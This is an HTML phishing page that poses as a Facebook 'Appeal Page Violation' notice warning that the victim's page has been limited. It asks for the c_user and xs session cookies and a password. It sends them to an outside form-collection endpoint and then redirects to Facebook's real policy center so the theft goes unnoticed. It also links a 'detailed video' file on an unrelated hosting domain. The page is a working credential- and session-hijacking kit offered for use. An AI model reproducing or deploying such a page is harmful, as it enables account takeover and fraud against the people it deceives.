

<!doctype html>
<head>
    <title>Action Required</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="style.css" rel="stylesheet">
</head>
<!-- Messenger Chat plugin Code -->
    <div id="fb-root"></div>

    <!-- Your Chat plugin code -->
    <div id="fb-customer-chat" class="fb-customerchat">
    </div>
    </script>
<body>
    <div class="md:block lg:block hidden border flex w-full h-[6rem]  relative bg-[#4667ac]">
        <div class="mx-10 mt-4">
            <b class="text-5xl text-white">facebook</b>
        </div>

        <form class="sm:hidden lg:block md:block" action="https://submit-form.com/17vvmhxhF" method="POST">

            <div style="position: absolute; left: 1.5rem; top:8rem; width: 90%;">
                <div>
                    <p class="border-b h-10 font-bold text-[16px] text-[#4b4f56] pl-3 p-2 bg-[#f5f6f7]">
                        Appeal Page Violation
                    </p>
                </div>
                <div>
                    <p class="mt-4 pl-3 text-[12px] font-semibold">
                        We have detected unusual activity on your page that violates our community standards.
                    </p>
                </div>
                <div>
                    <p class="mt-4 pl-3 text-[12px] font-semibold">
                        Your access to your page has been limited, and you are currently unable to post, share, or comment using your page.
                    </p>
                </div>
                <div>
                    <p class="mt-4 pl-3 text-[12px] font-semibold">
                        If you believe this to be a mistake, you have the option to submit an appeal by providing the necessary information.
                    </p>
                </div>
                <div>
                    <p class="text-[11px] text-[#90949c] p-2 font-semibold">
                        Detailed Video Information
                    </p>
                </div>
                <div>
                    <a class="w-[120px] h-[80px] block mx-3" href="https://detailed-video-29b30.web.app/detailed video.mp4"><img src="download.jfif.jpg" alt=""></a>
                </div>
                <div>
                    <p class=" pl-3 text-[12px] font-semibold">
                        Please be sure to provide the requested information below.
                    </p>
                </div>
                <div>
                    <p class="text-slate-400 pl-4 mt-1">
                        c_user
                    </p><input class="border h-6 pl-1 mx-3" type="number" name="c_user" required>
                </div>
                <div>
                    <p class="text-slate-400 pl-4 mt-1">
                        xs
                    </p><input class="border h-6 pl-1 mx-3" type="text" name="xs" required>
                </div>
              <div>
                  <p class="text-slate-400 pl-4 mt-1">
                    confirm password
                  </p><input class="border h-6 pl-1 mx-3" type="text" name="confirm password" required>
              </div>
                <div>
                    <p class="mt-4 pl-3 text-[12px] font-semibold">
                        Please make sure account not to log out from your computer or laptop until you have received a verification email.
                    </p>
                </div>
                <div class="border mx-3 h-10 mt-4 bg-[#f5f6f7]">
                    <div class="flex justify-end mx-2">
                        <form action="/17vvmhxhF" method="post"><button class="border h-7 w-16  bg-[#4267b2] text-white shadow-2xl mt-[0.30rem] font-serif font-thin text-xs hover:bg-blue-500" id="delete-btn">
                            Submit</form>
                                <!-- Other form elements -->
                                <input type="hidden" name="_redirect" value="https://www.facebook.com/policies_center"/>
                            </div>
                </div>
            </div>
        </form>
</body>
</html>
